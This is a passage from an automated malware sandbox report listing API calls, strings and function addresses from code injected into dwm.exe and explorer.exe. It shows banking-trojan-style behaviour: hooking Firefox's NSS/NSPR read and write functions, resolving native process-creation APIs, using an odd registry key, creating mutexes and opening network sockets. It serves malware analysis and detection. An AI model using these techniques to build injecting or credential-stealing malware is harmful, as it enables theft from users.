Part of subcall function 006433BB: HeapFree.KERNEL32(00000000,00000000,00644BB2), ref: 006433CE

Part of subcall function 00636BD7: RegOpenKeyExW.ADVAPI32(80000001,006527F0,00000000,00000001,?,?), ref: 00636C00

Part of subcall function 00649A9E: RegOpenKeyExW.ADVAPI32(80000001,00653EC0,00000000,00000001,?), ref: 00649ADD

Strings

nj<jFj, xrefs: 0064A5F4
G, xrefs: 0064A615

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00637EF9, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 93

APIs

CoCreateInstance.OLE32(006316C0,00000000,00004401,006316D0,?), ref: 00637F29
CoCreateInstance.OLE32(00631690,00000000,00004401,006316A0,?), ref: 00637F7C

Strings

D, xrefs: 00637FA7

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0064B4D3, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64

APIs

GetModuleHandleW.KERNEL32(nspr4.dll,00000000,7718F8FF,00000000), ref: 0064B4F0

Part of subcall function 0064B265: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0064B28C
Part of subcall function 0064B265: GetFileAttributesW.KERNEL32(?,?,?,?,?), ref: 0064B2E0
Part of subcall function 0064B265: GetPrivateProfileIntW.KERNEL32(?,?,000000FF,?), ref: 0064B343
Part of subcall function 0064B265: GetPrivateProfileStringW.KERNEL32(?,?,00000000,?,00000104,?), ref: 0064B36F

Part of subcall function 006433A3: HeapAlloc.KERNEL32(00000000,-00000004,0064B51B), ref: 006433B4

Part of subcall function 006433BB: HeapFree.KERNEL32(00000000,00000000,00644BB2), ref: 006433CE

Strings

p d, xrefs: 0064B554, 0064B56E, 0064B557
nspr4.dll, xrefs: 0064B4EB

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0064515D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62

APIs

WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00645186

Part of subcall function 00643346: HeapAlloc.KERNEL32(00000008,-00000003,006436F5,?,?,00000000,006441E1,?,?,?,?,?,00644191,?,?,?), ref: 00643368
Part of subcall function 00643346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,006436F5,?,?,00000000,006441E1,?,?,?,?,?,00644191,?,?), ref: 00643379

InternetReadFile.WININET(?,00001000,00001000,00001000), ref: 006451BD

Part of subcall function 006433BB: HeapFree.KERNEL32(00000000,00000000,00644BB2), ref: 006433CE

Strings

PjZjdj2jnj<jFj, xrefs: 006451BD

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00639C58, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56

APIs

SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?), ref: 00639CA8

Part of subcall function 00648AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00648B23
Part of subcall function 00648AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00648B4A
Part of subcall function 00648AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 00648B94
Part of subcall function 00648AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 00648BC1
Part of subcall function 00648AE4: Sleep.KERNEL32(00000000,?,?), ref: 00648BF1
Part of subcall function 00648AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00648C1F
Part of subcall function 00648AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 00648C31

Part of subcall function 006433BB: HeapFree.KERNEL32(00000000,00000000,00644BB2), ref: 006433CE

Strings

&, xrefs: 00639C7E
#, xrefs: 00639C8C

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0063A579, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56

APIs

SHGetFolderPathW.SHELL32(00000000,00000026,00000000,00000000,?), ref: 0063A5C9

Part of subcall function 00648AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00648B23
Part of subcall function 00648AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00648B4A
Part of subcall function 00648AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 00648B94
Part of subcall function 00648AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 00648BC1
Part of subcall function 00648AE4: Sleep.KERNEL32(00000000,?,?), ref: 00648BF1
Part of subcall function 00648AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00648C1F
Part of subcall function 00648AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 00648C31

Part of subcall function 006433BB: HeapFree.KERNEL32(00000000,00000000,00644BB2), ref: 006433CE

Strings

#, xrefs: 0063A5AD
&, xrefs: 0063A59F

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0064AA1A, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55

APIs

Part of subcall function 0064262D: WaitForSingleObject.KERNEL32(00000000,0063BB83), ref: 00642635

HttpAddRequestHeadersA.WININET(?,?,?,A0000000), ref: 0064AA6E

Part of subcall function 0064A6AF: SetLastError.KERNEL32(00002F78), ref: 0064A6F6
Part of subcall function 0064A6AF: HttpAddRequestHeadersA.WININET(?,?,000000FF,A0000000), ref: 0064A762
Part of subcall function 0064A6AF: HttpAddRequestHeadersA.WININET(?,?,000000FF,80000000), ref: 0064A77E
Part of subcall function 0064A6AF: HttpAddRequestHeadersA.WININET(?,?,000000FF,80000000), ref: 0064A795
Part of subcall function 0064A6AF: EnterCriticalSection.KERNEL32(00653F24), ref: 0064A79D
Part of subcall function 0064A6AF: LeaveCriticalSection.KERNEL32(00653F24,?), ref: 0064A853
Part of subcall function 0064A6AF: EnterCriticalSection.KERNEL32(00653F24), ref: 0064A87A
Part of subcall function 0064A6AF: LeaveCriticalSection.KERNEL32(00653F24,?), ref: 0064A8BA

HttpSendRequestExA.WININET(?,?,?,?,?), ref: 0064AAA9

Strings

<jFj, xrefs: 0064AAA9

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0064A97E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55

APIs

Part of subcall function 0064262D: WaitForSingleObject.KERNEL32(00000000,0063BB83), ref: 00642635

HttpAddRequestHeadersW.WININET(?,?,?,A0000000), ref: 0064A9D2

Part of subcall function 0064A6AF: SetLastError.KERNEL32(00002F78), ref: 0064A6F6
Part of subcall function 0064A6AF: HttpAddRequestHeadersA.WININET(?,?,000000FF,A0000000), ref: 0064A762
Part of subcall function 0064A6AF: HttpAddRequestHeadersA.WININET(?,?,000000FF,80000000), ref: 0064A77E
Part of subcall function 0064A6AF: HttpAddRequestHeadersA.WININET(?,?,000000FF,80000000), ref: 0064A795
Part of subcall function 0064A6AF: EnterCriticalSection.KERNEL32(00653F24), ref: 0064A79D
Part of subcall function 0064A6AF: LeaveCriticalSection.KERNEL32(00653F24,?), ref: 0064A853
Part of subcall function 0064A6AF: EnterCriticalSection.KERNEL32(00653F24), ref: 0064A87A
Part of subcall function 0064A6AF: LeaveCriticalSection.KERNEL32(00653F24,?), ref: 0064A8BA

HttpSendRequestExW.WININET(?,?,?,?,?), ref: 0064AA0D

Strings

2jnj<jFj, xrefs: 0064AA0D

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00642B08, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55

APIs

GetModuleHandleW.KERNEL32(?), ref: 00642B1F
GetProcAddress.KERNEL32(00000000,?), ref: 00642B41

Part of subcall function 006433BB: HeapFree.KERNEL32(00000000,00000000,00644BB2), ref: 006433CE

Strings

0x01D9C0A0, xrefs: 00642B63

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00648737, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47

APIs

GetTempPathW.KERNEL32(000000F6,?), ref: 0064874E

Part of subcall function 006446F4: GetTickCount.KERNEL32(00648766,?), ref: 006446F4

Part of subcall function 006440AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 006440CF

Part of subcall function 00648C40: PathCombineW.SHLWAPI(00641F45,00641F45,?), ref: 00648C5F

Part of subcall function 0064856B: CreateFileW.KERNEL32(00644E95,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00648585
Part of subcall function 0064856B: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 006485A8
Part of subcall function 0064856B: CloseHandle.KERNEL32(00000000), ref: 006485B5

Strings

%s%08x.%s, xrefs: 0064876C
tmp, xrefs: 00648767

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00646F8F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45

APIs

GetTempFileNameW.KERNEL32(?,cab,00000000,?), ref: 00646FB1

Part of subcall function 00648716: SetFileAttributesW.KERNEL32(00000080,00000080,0064B4CD,?), ref: 0064871F
Part of subcall function 00648716: DeleteFileW.KERNEL32(?), ref: 00648729

PathFindFileNameW.SHLWAPI(?), ref: 00646FD3

Part of subcall function 0064353A: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00644232,00000000,00000000,00000000,00643597,00000000,00000000,00000000,?,00000000), ref: 00643555

Strings

cab, xrefs: 00646FA6

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0064C8A1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42

APIs

Part of subcall function 00646AAA: GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,00000000,00000000,?,?,006449F4,?,?,?,00642326,000000FF,00652C08), ref: 00646AC3
Part of subcall function 00646AAA: GetLastError.KERNEL32(?,?,006449F4,?,?,?,00642326,000000FF,00652C08,?,?,00000000), ref: 00646AC9
Part of subcall function 00646AAA: GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,00000000,?,?,006449F4,?,?,?,00642326,000000FF,00652C08), ref: 00646AEF

EqualSid.ADVAPI32(00000000,00000000,?,00000000,?,0064C9FB,00000000,?,?,?), ref: 0064C8C6

Part of subcall function 006433BB: HeapFree.KERNEL32(00000000,00000000,00644BB2), ref: 006433CE

Part of subcall function 00644CDD: LoadLibraryA.KERNEL32(userenv.dll), ref: 00644CEE
Part of subcall function 00644CDD: GetProcAddress.KERNEL32(00000000,CreateEnvironmentBlock,00000000,?), ref: 00644D0D
Part of subcall function 00644CDD: GetProcAddress.KERNEL32(?,DestroyEnvironmentBlock), ref: 00644D19
Part of subcall function 00644CDD: CreateProcessAsUserW.ADVAPI32(?,00000000,0064C8F5,00000000,00000000,00000000,0064C8F5,0064C8F5,00000000,?,?,?,00000000,00000044), ref: 00644D8A
Part of subcall function 00644CDD: CloseHandle.KERNEL32(?), ref: 00644D9D
Part of subcall function 00644CDD: CloseHandle.KERNEL32(?), ref: 00644DA2
Part of subcall function 00644CDD: FreeLibrary.KERNEL32(?), ref: 00644DB9

CloseHandle.KERNEL32(?), ref: 0064C907

Strings

"%s", xrefs: 0064C8DA

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00640397, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41

APIs

getpeername.WS2_32(000000FF,00000000,00000000), ref: 006403BB
getsockname.WS2_32(000000FF,00000000,00000000), ref: 006403CA

Part of subcall function 006463E5: #19.WS2_32(00000000,00000000,00000000,00000000,0063EF4E,?,00000000,00000004,?,00000000,00000000,00000000,?,00000000), ref: 006463F3

Strings

<Mc, xrefs: 00640397

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 00645484, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 39

APIs

Part of subcall function 00645403: LoadLibraryA.KERNEL32(urlmon.dll), ref: 00645414
Part of subcall function 00645403: GetProcAddress.KERNEL32(00000000,ObtainUserAgentString), ref: 00645427
Part of subcall function 00645403: FreeLibrary.KERNEL32(?), ref: 00645479

GetTickCount.KERNEL32(?), ref: 006454C9

Part of subcall function 006452D1: WaitForSingleObject.KERNEL32(?,?), ref: 00645325
Part of subcall function 006452D1: Sleep.KERNEL32(?,?,?,00000000), ref: 00645338
Part of subcall function 006452D1: InternetCloseHandle.WININET(00000000), ref: 006453BE

GetTickCount.KERNEL32(00000000), ref: 006454DB

Part of subcall function 006433BB: HeapFree.KERNEL32(00000000,00000000,00644BB2), ref: 006433CE

Strings

http://www.google.com/webhp, xrefs: 006454A9

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0064672E, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18

APIs

Part of subcall function 0064666B: select.WS2_32(00000000,?,00000000,00000000,00000001), ref: 006466EA
Part of subcall function 0064666B: WSASetLastError.WS2_32(0000274C), ref: 006466F9

accept.WS2_32(00000000,00000000,00000001), ref: 00646754

Strings

K2w, xrefs: 00646754
<Mc, xrefs: 0064672E

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0063A2EA, Relevance: 5.2, APIs: 4, Instructions: 197

APIs

Part of subcall function 00648C40: PathCombineW.SHLWAPI(00641F45,00641F45,?), ref: 00648C5F

Part of subcall function 006485D0: CreateFileW.KERNEL32(?,80000000,?,00000000,00000003,00000000,00000000), ref: 006485F5
Part of subcall function 006485D0: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,00642D27,?,?,00000000), ref: 00648608
Part of subcall function 006485D0: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,00642D27,?,?,00000000), ref: 00648630
Part of subcall function 006485D0: ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 00648648
Part of subcall function 006485D0: VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,00642D27,?,?,00000000), ref: 00648662
Part of subcall function 006485D0: CloseHandle.KERNEL32(?), ref: 0064866B

StrStrIA.SHLWAPI(?,?), ref: 0063A410
StrStrIA.SHLWAPI(?,?), ref: 0063A422
StrStrIA.SHLWAPI(?,?), ref: 0063A432
StrStrIA.SHLWAPI(?,?), ref: 0063A444

Part of subcall function 006440AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 006440CF

Part of subcall function 006433BB: HeapFree.KERNEL32(00000000,00000000,00644BB2), ref: 006433CE

Part of subcall function 00648678: VirtualFree.KERNEL32(?,00000000,00008000,00000000,0064C83B,?,?,.exe,00000000,00000000,?,.exe,00000006), ref: 00648689
Part of subcall function 00648678: CloseHandle.KERNEL32(?), ref: 00648697

Part of subcall function 0064338B: HeapAlloc.KERNEL32(00000008,-00000004,00644B59,00000000,?,?,?,00641E08,00000000,006422ED,?,?,00000000), ref: 0064339C

Part of subcall function 00648AE4: FindFirstFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00648B23
Part of subcall function 00648AE4: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00648B4A
Part of subcall function 00648AE4: PathMatchSpecW.SHLWAPI(?,?), ref: 00648B94
Part of subcall function 00648AE4: Sleep.KERNEL32(00000000,?,?,?,00000000), ref: 00648BC1
Part of subcall function 00648AE4: Sleep.KERNEL32(00000000,?,?), ref: 00648BF1
Part of subcall function 00648AE4: FindNextFileW.KERNEL32(?,?,?,?,?,00000000), ref: 00648C1F
Part of subcall function 00648AE4: FindClose.KERNEL32(?,?,?,?,00000000), ref: 00648C31

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Function 0064AD5F, Relevance: 5.1, APIs: 4, Instructions: 71

APIs

EnterCriticalSection.KERNEL32(00653FB4,?,?,?,0064B052,?), ref: 0064AD7C

Part of subcall function 006433BB: HeapFree.KERNEL32(00000000,00000000,00644BB2), ref: 006433CE

LeaveCriticalSection.KERNEL32(00653FB4,?,?,?,0064B052,?), ref: 0064AD9D
EnterCriticalSection.KERNEL32(00653FB4,?,?,?,?,0064B052,?), ref: 0064ADAE

Part of subcall function 00643346: HeapAlloc.KERNEL32(00000008,-00000003,006436F5,?,?,00000000,006441E1,?,?,?,?,?,00644191,?,?,?), ref: 00643368
Part of subcall function 00643346: HeapReAlloc.KERNEL32(00000008,00000200,-00000003,006436F5,?,?,00000000,006441E1,?,?,?,?,?,00644191,?,?), ref: 00643379

LeaveCriticalSection.KERNEL32(00653FB4,?,?,?,0064B052,?), ref: 0064AE47

Memory Dump Source

Source File: 00000004.00000002.2018389834.00630000.00000040.sdmp, Offset: 00630000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_630000_dwm.jbxd

Analysis Process: explorer.exe PID: 2032 Parent PID: 3700

Executed Functions

Function 01B620C4, Relevance: 47.5, APIs: 16, Strings: 11, Instructions: 229

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000000), ref: 01B62105
LoadLibraryA.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 01B62172
GetModuleHandleW.KERNEL32(?,LoadLibraryA,GetProcAddress,?,?,00000000), ref: 01B621DB
GetProcAddress.KERNEL32(00000000,NtCreateThread,?,?,00000000), ref: 01B621FA
GetProcAddress.KERNEL32(NtCreateUserProcess,?,?,00000000), ref: 01B6220C
GetProcAddress.KERNEL32(NtQueryInformationProcess,?,?,00000000), ref: 01B6221E
GetProcAddress.KERNEL32(RtlUserThreadStart,?,?,00000000), ref: 01B62230
GetProcAddress.KERNEL32(LdrLoadDll,?,?,00000000), ref: 01B62242
GetProcAddress.KERNEL32(LdrGetDllHandle,?,?,00000000), ref: 01B62254
HeapCreate.KERNELBASE(00000000,00080000,00000000,?,?,00000000), ref: 01B6228D
GetProcessHeap.KERNEL32(?,?,00000000), ref: 01B6229C
InitializeCriticalSection.KERNEL32(01B7400C,?,?,00000000), ref: 01B622C9
WSAStartup.WS2_32(00000202,?), ref: 01B622DF
CreateEventW.KERNEL32(01B72C30,00000001,00000000,00000000,?,?,00000000), ref: 01B62300

Part of subcall function 01B649D2: OpenProcessToken.ADVAPI32(?,00000008,?,76C61857,?,?,01B62326,000000FF,01B72C08,?,?,00000000), ref: 01B649E2
Part of subcall function 01B649D2: GetTokenInformation.KERNELBASE(?,0000000C,00000000,00000004,00000000,?,?,?,01B62326,000000FF,01B72C08), ref: 01B64A0E
Part of subcall function 01B649D2: CloseHandle.KERNEL32(?), ref: 01B64A23

GetLengthSid.ADVAPI32(00000000,000000FF,01B72C08,?,?,00000000), ref: 01B62335

Part of subcall function 01B61E2D: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,C:\Users\admin\AppData\Roaming), ref: 01B61E4B
Part of subcall function 01B61E2D: PathRemoveBackslashW.SHLWAPI(C:\Users\admin\AppData\Roaming), ref: 01B61E5A
Part of subcall function 01B61E2D: GetModuleFileNameW.KERNEL32(00000000,?,00000104,76C61857), ref: 01B61E6E

GetCurrentProcessId.KERNEL32(00000000,08A4F7D0,00000000,?,?,00000000), ref: 01B62362

Part of subcall function 01B61E8F: IsBadReadPtr.KERNEL32(?,?), ref: 01B61EBD

Part of subcall function 01B67A14: StringFromGUID2.OLE32(00000000,?,00000028), ref: 01B67AB5

Part of subcall function 01B61F98: InitializeCriticalSection.KERNEL32(01B73FB4,00000000,76C61857,00000000), ref: 01B61FAF
Part of subcall function 01B61F98: InitializeCriticalSection.KERNEL32(01B72AC8), ref: 01B61FE4
Part of subcall function 01B61F98: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01B6200C
Part of subcall function 01B61F98: ReadFile.KERNEL32(00000000,?,000001FE,000001FE,00000000), ref: 01B62029
Part of subcall function 01B61F98: CloseHandle.KERNEL32(00000000), ref: 01B6203A
Part of subcall function 01B61F98: InitializeCriticalSection.KERNEL32(01B723AC), ref: 01B62081
Part of subcall function 01B61F98: GetModuleHandleW.KERNEL32(nspr4.dll), ref: 01B62093
Part of subcall function 01B61F98: GetModuleHandleW.KERNEL32(nss3.dll), ref: 01B6209E

Part of subcall function 01B61EE1: SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?), ref: 01B61F2C
Part of subcall function 01B61EE1: lstrcmpiW.KERNEL32(?,?,?), ref: 01B61F56

Strings

Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769}, xrefs: 01B623F3
{3FF5AE44-1EE1-8646-676C-E42BACAD1769}, xrefs: 01B623AB
LoadLibraryA, xrefs: 01B62127
NtQueryInformationProcess, xrefs: 01B6220E
NtCreateThread, xrefs: 01B621F4
LdrLoadDll, xrefs: 01B62232
LdrGetDllHandle, xrefs: 01B62244
RtlUserThreadStart, xrefs: 01B62220
SOFTWARE\Microsoft\Xyuxy, xrefs: 01B623F9
NtCreateUserProcess, xrefs: 01B621FC
GetProcAddress, xrefs: 01B6211D

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B61F98, Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 91

APIs

InitializeCriticalSection.KERNEL32(01B73FB4,00000000,76C61857,00000000), ref: 01B61FAF
InitializeCriticalSection.KERNEL32(01B72AC8), ref: 01B61FE4

Part of subcall function 01B62828: PathRenameExtensionW.SHLWAPI(?,.dat), ref: 01B628A1

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01B6200C
ReadFile.KERNEL32(00000000,?,000001FE,000001FE,00000000), ref: 01B62029
CloseHandle.KERNEL32(00000000), ref: 01B6203A

Part of subcall function 01B69D6D: InitializeCriticalSection.KERNEL32(01B73F24,00000000,7718F8FF), ref: 01B69D8F
Part of subcall function 01B69D6D: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,00000000), ref: 01B69E63

Part of subcall function 01B6B4D3: GetModuleHandleW.KERNEL32(nspr4.dll,00000000,7718F8FF,00000000), ref: 01B6B4F0

InitializeCriticalSection.KERNEL32(01B723AC), ref: 01B62081

Part of subcall function 01B5E0FB: GetCurrentThreadId.KERNEL32(7718F8FF), ref: 01B5E108
Part of subcall function 01B5E0FB: GetThreadDesktop.USER32(00000000), ref: 01B5E10F
Part of subcall function 01B5E0FB: GetUserObjectInformationW.USER32(00000000,00000002,?,00000064,?), ref: 01B5E128

GetModuleHandleW.KERNEL32(nspr4.dll), ref: 01B62093
GetModuleHandleW.KERNEL32(nss3.dll), ref: 01B6209E

Part of subcall function 01B5C103: GetModuleHandleW.KERNEL32(nss3.dll,00000000,76C619C1,00000000,01B620A9), ref: 01B5C111
Part of subcall function 01B5C103: GetProcAddress.KERNEL32(00000000,PR_OpenTCPSocket,00000000,76C619C1,00000000,01B620A9), ref: 01B5C125
Part of subcall function 01B5C103: GetProcAddress.KERNEL32(00000000,PR_Close), ref: 01B5C132
Part of subcall function 01B5C103: GetProcAddress.KERNEL32(00000000,PR_Read), ref: 01B5C13F
Part of subcall function 01B5C103: GetProcAddress.KERNEL32(00000000,PR_Write), ref: 01B5C14C

Strings

nss3.dll, xrefs: 01B62099
nspr4.dll, xrefs: 01B6208E

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B54DBD, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151

APIs

Part of subcall function 01B62507: CreateMutexW.KERNELBASE(01B72C30,00000000,?,?,?,?,?), ref: 01B62528

Part of subcall function 01B6262D: WaitForSingleObject.KERNEL32(00000000,01B5776D), ref: 01B62635

WaitForSingleObject.KERNEL32(000003E8,?), ref: 01B54E28
CloseHandle.KERNEL32(?), ref: 01B54F89

Part of subcall function 01B5E959: CreateMutexW.KERNELBASE(Function_00022C30,00000000,Global\{A98E1C61-ACC4-103D-676C-E42BACAD1769},?,?,01B54E69,?,?,?,743C152E,00000002), ref: 01B5E97F

WaitForMultipleObjects.KERNEL32(?,?,00000000,000000FF), ref: 01B54EB9
WSAEventSelect.WS2_32(00000000,00000000,00000000), ref: 01B54EFA
WSAIoctl.WS2_32(00000000,8004667E,?,00000004,00000000,00000000,?,00000000,00000000), ref: 01B54F1A

Part of subcall function 01B667B6: setsockopt.WS2_32(?,00000006,00000001,?,00000004), ref: 01B667CC

Part of subcall function 01B64DF0: CreateThread.KERNEL32(00000000,?,00000000,01B5748F,00000000,01B5748F), ref: 01B64E04
Part of subcall function 01B64DF0: CloseHandle.KERNEL32(00000000), ref: 01B64E0F

accept.WS2_32(?,00000000,00000000), ref: 01B54F45
WaitForMultipleObjects.KERNEL32(?,?,00000000,00000000), ref: 01B54F59

Part of subcall function 01B6675E: shutdown.WS2_32(?,00000002), ref: 01B66766
Part of subcall function 01B6675E: #3.WS2_32(?), ref: 01B6676D

CloseHandle.KERNEL32(?), ref: 01B54F7A

Part of subcall function 01B66B8E: ReleaseMutex.KERNEL32(00000000,01B63021,?,?,?), ref: 01B66B92

Part of subcall function 01B5E89E: RegOpenKeyExW.ADVAPI32(80000001,SOFTWARE\Microsoft\Xyuxy,00000000,00000001,?,?,76C605D7,00000000), ref: 01B5E8E0

Part of subcall function 01B54C68: getsockname.WS2_32(?,?,?), ref: 01B54CBE
Part of subcall function 01B54C68: CloseHandle.KERNEL32(?), ref: 01B54CE2

Strings

K2w, xrefs: 01B54EC7

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B5773A, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 160

APIs

Part of subcall function 01B62507: CreateMutexW.KERNELBASE(01B72C30,00000000,?,?,?,?,?), ref: 01B62528

GetCurrentThread.KERNEL32(000000F1,743C1521,00000002), ref: 01B5775B
SetThreadPriority.KERNEL32(00000000), ref: 01B57762

Part of subcall function 01B6262D: WaitForSingleObject.KERNEL32(00000000,01B5776D), ref: 01B62635

WaitForSingleObject.KERNEL32(0000EA60), ref: 01B57780

Part of subcall function 01B69A9E: RegOpenKeyExW.ADVAPI32(80000001,01B73EC0,00000000,00000001,?), ref: 01B69ADD

CreateMutexW.KERNEL32(01B72C30,00000001,?,20000000), ref: 01B57843
GetLastError.KERNEL32 ref: 01B57853
CloseHandle.KERNEL32(00000000), ref: 01B57861

Part of subcall function 01B6338B: HeapAlloc.KERNEL32(00000008,-00000004,01B64B59,00000000,?,?,?,01B61E08,00000000,01B622ED,?,?,00000000), ref: 01B6339C

Part of subcall function 01B64DF0: CreateThread.KERNEL32(00000000,?,00000000,01B5748F,00000000,01B5748F), ref: 01B64E04
Part of subcall function 01B64DF0: CloseHandle.KERNEL32(00000000), ref: 01B64E0F

Part of subcall function 01B633BB: HeapFree.KERNEL32(00000000,00000000,01B64BB2), ref: 01B633CE

Part of subcall function 01B640AE: wvnsprintfW.SHLWAPI(?,?,?,?), ref: 01B640CF

WaitForSingleObject.KERNEL32(0000EA60), ref: 01B57919

Part of subcall function 01B66B8E: ReleaseMutex.KERNEL32(00000000,01B63021,?,?,?), ref: 01B66B92

Strings

Global\%08X%08X%08X, xrefs: 01B5781D

Memory Dump Source

Source File: 00000005.00000002.2019396584.01B50000.00000040.sdmp, Offset: 01B50000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1b50000_explorer.jbxd

Function 01B563F0, Relevance: 10.7, APIs: 7, Instructions: 216

APIs

Part of subcall function 01B62507: CreateMutexW.KERNELBASE(01B72C30,00000000,?,?,?,?,?), ref: 01B62528

Part of subcall function 01B6262D: WaitForSingleObject.KERNEL32(00000000,01B5776D), ref: 01B62635

